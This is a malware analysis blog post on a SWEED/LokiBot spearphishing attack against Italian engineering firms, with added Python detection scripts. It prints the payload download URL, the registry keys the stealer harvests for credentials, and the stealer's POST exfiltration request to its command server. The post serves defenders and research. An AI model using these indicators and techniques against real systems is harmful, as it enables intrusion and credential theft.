SWEED targets precision engineering companies in Italy

Security expert Marco Ramilli published a quick analysis of an interesting attack carried out by the SWEED threat actor targeting precision engineering firms in Italy.

Introduction

Today I’d like to share a quick analysis of an interesting attack targeting precision engineering companies based in Italy. Precision engineering is a very important business market in Europe: it includes developing mechanical equipment for automotive, railways, heavy industries and military-grade technology. The attacker pretended to be a customer and sent the victim a well-crafted email containing a Microsoft XLS file that included real spare-part codes, quantities and shipping addresses. It is a very similar attack schema to the MartyMCFly campaign.

Technical Analysis

Hash: 863934c1fa4378799ed0c3e353603ba0bee3a357a5c63d845fe0d7f4ebc1a64c
Threat: Microsoft Excel Document
Brief Description: Exploiter, Dropper and Executor targeting precision engineering companies
Ssdeep: 384:janC18qmTUKhKVxbo6JpM2gwmeJxQrHwFeDtug/uND40C2D:janCOqm4tVxE6rM2g0fO2exuxC0FD

On 2019-10-26 a well-crafted email coming from steel@vardhman.com, asking for an economic proposal, reached specific mailboxes belonging to the purchasing department of a well-known precision engineering company. Basically the attacker asks the victim to quote the entire list of spare parts included in an attached Excel document. The source address looks genuine, since it belongs to a big company working in the textile field, which frequently uses precision equipment machines in its production chain.

Attacker spreadsheet looking real

Once the victim opens the document, it sees a “looking real” Microsoft Excel spreadsheet. Surprisingly, the spreadsheet does not hold any Macro code, so no strange message and no request to enable macros or compatibility mode appears on the victim’s screen. Everything looks real except for the third object included in the Excel file.

Object-3 exploiting CVE-2017-11882

If you are familiar with CVE-2017-11882 you might notice it immediately; if you are not, take a look HERE (for the exploit generation), HERE (for an example) and HERE (for the original CVE disclosure). In a nutshell, CVE-2017-11882 is a 17-year-old memory corruption issue in Microsoft Office (including Office 365). When exploited successfully, it lets attackers execute code on a vulnerable machine, with no further user interaction, once a malicious document is opened. The flaw resides in Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that inserts or edits Object Linking and Embedding (OLE) objects in documents.
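The Equation Editor object leaves recognisable traces in the document itself, so a document can be triaged before it is ever opened. The following Python script is an added example, not code from the original analysis: it scans a legacy OLE2 container (.xls/.doc) as a whole, or the embedded-object parts of an OOXML package (.xlsx/.docx), for the Equation.3 class identifier (0002CE02-0000-0000-C000-000000000046), the "Equation Native" stream name and the "Equation.3" ProgID. The sample documents are synthetic byte blobs constructed inline; a hit means the object is present and the file deserves sandboxing, not that the exploit is confirmed.

```python
"""
Static triage for documents carrying an Equation Editor (Equation.3) OLE object.
Added example, not part of the original analysis. Legacy OLE2 files are
scanned as a whole; OOXML packages are opened as zips and their
*/embeddings/* parts are scanned. Sample inputs are constructed, not real malware.
"""
from __future__ import annotations

import io
import uuid
import zipfile

# Equation Editor 3.0 class identifier. OLE serialises GUIDs with the first
# three fields little-endian, which is exactly what uuid.bytes_le yields.
EQUATION3_CLSID_LE = uuid.UUID("0002CE02-0000-0000-C000-000000000046").bytes_le
# Directory entry names inside a compound file are stored as UTF-16LE.
EQUATION_NATIVE_UTF16 = "Equation Native".encode("utf-16-le")
EQUATION3_PROGID = b"Equation.3"

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZIP_MAGIC = b"PK\x03\x04"


def scan_bytes(blob: bytes) -> list[str]:
    """Return the Equation Editor indicators present in a raw byte blob."""
    hits = []
    if EQUATION3_CLSID_LE in blob:
        hits.append("clsid:Equation.3")
    if EQUATION_NATIVE_UTF16 in blob:
        hits.append("stream:Equation Native")
    if EQUATION3_PROGID in blob:
        hits.append("progid:Equation.3")
    return hits


def triage_document(data: bytes) -> dict:
    """Identify the container type and collect indicators per container part."""
    if data.startswith(OLE2_MAGIC):
        return {"container": "ole2", "indicators": {"<root>": scan_bytes(data)}}
    if data.startswith(ZIP_MAGIC):
        found = {}
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                # Embedded OLE objects live under xl/embeddings/ or word/embeddings/.
                if "/embeddings/" in name:
                    hits = scan_bytes(zf.read(name))
                    if hits:
                        found[name] = hits
        return {"container": "ooxml", "indicators": found}
    return {"container": "unknown", "indicators": {}}


def is_suspicious(report: dict) -> bool:
    """True when any part of the document carries an Equation Editor indicator."""
    return any(report["indicators"].values())


# ---- Constructed samples (synthetic bytes, not real malware) ---------------
def build_xlsx_with_equation_object() -> bytes:
    """OOXML package whose third embedded object carries the Equation.3 CLSID."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/embeddings/oleObject1.bin", b"\x00" * 32)
        zf.writestr("xl/embeddings/oleObject3.bin",
                    b"\x00" * 64 + EQUATION3_CLSID_LE + EQUATION_NATIVE_UTF16)
    return buf.getvalue()


def build_benign_xlsx() -> bytes:
    """OOXML package with no embedded objects at all."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
    return buf.getvalue()


def build_xls_with_equation_stream() -> bytes:
    """Minimal stand-in for a legacy OLE2 file containing an Equation Native stream."""
    return OLE2_MAGIC + b"\x00" * 120 + EQUATION_NATIVE_UTF16 + b"\x00" * 8


if __name__ == "__main__":
    for label, doc in [("xlsx-with-eq", build_xlsx_with_equation_object()),
                       ("xlsx-benign", build_benign_xlsx()),
                       ("xls-with-eq", build_xls_with_equation_stream())]:
        report = triage_document(doc)
        print(label, "SUSPICIOUS" if is_suspicious(report) else "clean", report["indicators"])
```

The raw byte search deliberately avoids parsing the compound-file FAT, so it also catches objects hidden in slack space or in non-standard containers; the trade-off is that a document that legitimately embeds an equation will also be flagged, which is why the verdict is "sandbox this", not "malicious".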

Once the victim opens the document, apparently nothing happens, but silently Object3 launches Equation Editor and exploits the memory corruption vulnerability, executing code on the host.

Equation Editor crashes and executes code

The code execution implements a classic drop-and-execute: it fetches a Windows PE file from http[://mail.hajj.zeem.sa/wp-admin/edu/educrety.exe and runs it directly in memory, exhibiting fileless behavior.
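On the endpoint, the drop-and-execute step is easy to spot because Equation Editor is a COM server that has no reason to create processes or open network connections. The following Python detector is an added example, not code from the original analysis; it runs three rules over constructed Sysmon-style JSON events (Event ID 1 = process creation, Event ID 3 = network connection). The user, paths and PIDs are made up; the only value taken from the analysis is the download host. Note that EQNEDT32.EXE is started by the DCOM launcher, so its parent is svchost.exe rather than EXCEL.EXE, and a rule keyed only on Office-spawned children would miss it.

```python
"""
Behavioural detection for Equation Editor abuse (CVE-2017-11882 style).
Added example, not part of the original analysis. Telemetry is constructed
Sysmon-style newline-delimited JSON; only the download host comes from the report.
"""
from __future__ import annotations

import json

EQUATION_EDITOR = "eqnedt32.exe"

# Constructed events (not real telemetry). EQNEDT32.EXE is launched via DCOM,
# so its parent is svchost.exe; the dropped PE is then its child.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "EXCEL.EXE quotation.xls"}
{"EventID": 1, "Image": "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "EQNEDT32.EXE -Embedding"}
{"EventID": 3, "Image": "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", "DestinationHostname": "mail.hajj.zeem.sa", "DestinationPort": 80}
{"EventID": 1, "Image": "C:\\Users\\buyer\\AppData\\Roaming\\educrety.exe", "ParentImage": "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", "CommandLine": "educrety.exe"}
{"EventID": 3, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "DestinationHostname": "example.org", "DestinationPort": 443}
"""


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_equation_editor_abuse(event_lines: str) -> list[tuple[str, str]]:
    """
    Run three rules over newline-delimited JSON events and return
    (rule, detail) pairs in event order:
      eqnedt32_started        informational: the editor was launched at all
      eqnedt32_child_process  high: the editor spawned a process
      eqnedt32_network        high: the editor opened a network connection
    """
    alerts = []
    for line in event_lines.strip().splitlines():
        ev = json.loads(line)
        image = image_name(ev.get("Image", ""))
        parent = image_name(ev.get("ParentImage", ""))
        if ev["EventID"] == 1 and image == EQUATION_EDITOR:
            alerts.append(("eqnedt32_started", parent))
        if ev["EventID"] == 1 and parent == EQUATION_EDITOR:
            alerts.append(("eqnedt32_child_process", image))
        if ev["EventID"] == 3 and image == EQUATION_EDITOR:
            dest = f'{ev["DestinationHostname"]}:{ev["DestinationPort"]}'
            alerts.append(("eqnedt32_network", dest))
    return alerts


def severity(alerts: list[tuple[str, str]]) -> str:
    """Overall severity: 'high' for any child-process/network hit, else 'info'/'none'."""
    if any(rule != "eqnedt32_started" for rule, _ in alerts):
        return "high"
    return "info" if alerts else "none"


if __name__ == "__main__":
    found = detect_equation_editor_abuse(SAMPLE_EVENTS)
    for rule, detail in found:
        print(f"{rule:24s} {detail}")
    print("severity:", severity(found))
```

The "started" rule is kept at informational level because a legitimate document with an equation also launches EQNEDT32.EXE; on a patched estate (Microsoft removed the component in the January 2018 Office updates) even that launch is worth a ticket, and Microsoft's advisory for CVE-2017-11882 also documented a COM Compatibility Flags registry workaround for the Equation.3 CLSID on hosts that cannot be patched.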

Analysis of Dropped PE File

Hash: 64114c398f1c14d4e840f62395edd9a8c43d834708f8d8fce12f8a6502b0e981
Threat: Sensitive data stealer
Brief description: Looks for stored passwords and tries to push them to command and control servers
Ssdeep: 6144:htbOljxWyjJypr+QqhdJdUwcPWFNEwXh/XEVOwG6Fro:h9OXByoXLU7eFNEwREVOJv
File name: educrety.exe

The dropped PE (educrety.exe) is compiled with Microsoft Visual C++ and holds a nice icon :P. According to the VT detection history the same hash has been seen with at least three different names: educrety.exe, prestezza.exe and cardsharper.exe. ExifTool shows that prestezza.exe is the original file name, while the project’s internal name is cardsharper.exe. Once run, the sample harvests information from many registry keys where vendors commonly save access credentials or access tokens. For example (for the full list of registry keys have a look here):

[…]
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\092aab115f965648a37b74181b1110f0
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\092aab115f965648a37b74181b1110f0\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\77de0b05e2a16d4fb6c76bf01ccd1603
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\77de0b05e2a16d4fb6c76bf01ccd1603\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\79e73bb51ce14d4a82e1f99654d0fc40
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\79e73bb51ce14d4a82e1f99654d0fc40\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8a1c49cb145d7448927a71ec9112e8a4
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8a1c49cb145d7448927a71ec9112e8a4\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP Server
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 Server
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 User Name
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\NNTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\NNTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\NNTP Server
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP Server
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP User Name
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTP Server URL
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTPMail User Name
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTPMail Server
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 Port
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP Port
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP Port
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 Password2
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP Password2
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\NNTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTPMail Password2
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 Password
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP Password
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\NNTP Password
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTP Password
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP Password
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ba01e474e967cd44b1abf533b2f10f52
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ba01e474e967cd44b1abf533b2f10f52\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\d8795abf811b0f4ea6b2bf0a97c4cb21
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\d8795abf811b0f4ea6b2bf0a97c4cb21\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper

[…]

Once it gets the credentials, it pushes them to a command and control server at http[://www.corpcougar.com/edu/Panel/five/fre.php in the following way:

POST /edu/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.corpcougar.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: EEABFA
Content-Length: 190
Connection: close

Network trace

Considering the User-Agent, the network trace and, most of all, the push path, it reminds me of the LokiBot malware. “Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.” – PhishMe. Playing a little bit with the command and control, it turns out that more than one Command and Control was installed on the same domain, each one with its own path, and the sample I analyzed was currently using only one path. It makes sense, since VT collected different samples related to the analyzed one, which would probably include different malware campaigns and different artifact names.
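The check-in above has several traits that do not occur in browser or application traffic, so it can be matched on a proxy or IDS feed without any sample in hand. The following Python classifier is an added example, not code from the original analysis: it parses a raw HTTP request head and scores the fixed "Mozilla/4.08 (Charon; Inferno)" User-Agent, the non-standard Content-Key header, a binary POST over HTTP/1.0 and a path ending in fre.php. The first request reproduces the headers from the trace with a constructed placeholder body; the second, benign request is made up for comparison. The indicator names are my own labels.

```python
"""
Classifier for LokiBot-style panel check-ins as seen in the network trace.
Added example, not part of the original analysis. CAPTURED_REQUEST reuses
the headers from the trace with a constructed body; BENIGN_REQUEST is made up.
"""
from __future__ import annotations

LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"

# Headers exactly as in the captured trace; the 190-byte body is not
# reproduced, a constructed placeholder stands in for it.
CAPTURED_REQUEST = (
    "POST /edu/Panel/five/fre.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: www.corpcougar.com\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: EEABFA\r\n"
    "Content-Length: 190\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<constructed binary body>"
)

# Constructed benign upload for comparison (host and path are made up).
BENIGN_REQUEST = (
    "POST /api/upload HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/70.0\r\n"
    "Host: files.example.org\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 4\r\n"
    "\r\n"
    "data"
)


def parse_request(raw: str) -> dict:
    """Split a raw request into method, path, version and a lower-cased header map."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    request_line, *header_lines = head.split("\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def lokibot_indicators(raw: str) -> list[str]:
    """Return the indicator labels matched by the request, in a fixed order."""
    req = parse_request(raw)
    h = req["headers"]
    found = []
    if h.get("user-agent") == LOKIBOT_USER_AGENT:
        found.append("charon_inferno_user_agent")
    if "content-key" in h:  # not a standard HTTP header
        found.append("content_key_header")
    if req["path"].lower().endswith("/fre.php"):
        found.append("fre_php_panel_path")
    if (req["method"] == "POST" and req["version"] == "HTTP/1.0"
            and h.get("content-type") == "application/octet-stream"):
        found.append("binary_post_http10")
    return found


def classify(raw: str) -> str:
    """
    'c2' when a strong trait (the hard-coded User-Agent or the Content-Key
    header) is present or at least two weaker traits coincide; 'review' for
    a single weak trait; 'benign' otherwise.
    """
    found = lokibot_indicators(raw)
    strong = {"charon_inferno_user_agent", "content_key_header"}
    if strong & set(found) or len(found) >= 2:
        return "c2"
    return "review" if found else "benign"


if __name__ == "__main__":
    for label, req in [("captured", CAPTURED_REQUEST), ("benign", BENIGN_REQUEST)]:
        print(label, classify(req), lokibot_indicators(req))
```

Matching on the User-Agent and Content-Key header rather than on the domain is deliberate: the analysis notes that the same domain hosted several panels under different paths, and other campaigns use different domains entirely, while the protocol traits stay constant across samples.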

IndexOf C&C

ATT&CK TTP Summary

The following MITRE ATT&CK mapping was compiled according to the findings.

Initial Access: T1193 (Spearphishing Attachment)
Execution: T1204 (User Execution)
Defense Evasion: T1107 (File Deletion – deletes original file after infection); T1158 (Hidden Files and Directories); T1045 (Software Packing – threat comes packed/encrypted)
Credential Access: T1003 (Credential Dumping); T1081 (Credentials in Files); T1214 (Credentials in Registry)
Collection: T1005 (Data from Local System)
Exfiltration: T1002 (Data Encrypted)
Command and Control: T1043 (Commonly Used Port); T1071 (Standard Application Layer Protocol)

Conclusions

According to Cisco Talos (here and here) a large number of ongoing malware distribution campaigns, including such notable malware as Formbook, LokiBot and Agent Tesla, could be related to a single threat actor called “SWEED”. I did find many similarities to “SWEED”, including the original attack vectors, the Microsoft Office exploit used, the LokiBot implementation and the victim type, so I believe this attack could also be attributed to the same threat actor. Moreover, the techniques used and the care taken over the whole attack, which included a study of the victim’s products (remember the real spare-part codes in the Excel file?), remind me of a more recent analysis by Fortinet, so I believe it might be attributed to the same threat actor as well as the attack described here.

Finally, I think the “SWEED” threat actor is attacking Italian precision engineering companies. The TTPs and communication schema are so close to each other that it is hard to believe in a coincidence.

The original post, including IoCs and Yara rules, is available on Marco Ramilli’s blog:

SWEED Targeting Precision Engineering Companies in Italy


Pierluigi Paganini

(SecurityAffairs – SWEED, hacking)

The post SWEED targets precision engineering companies in Italy appeared first on Security Affairs.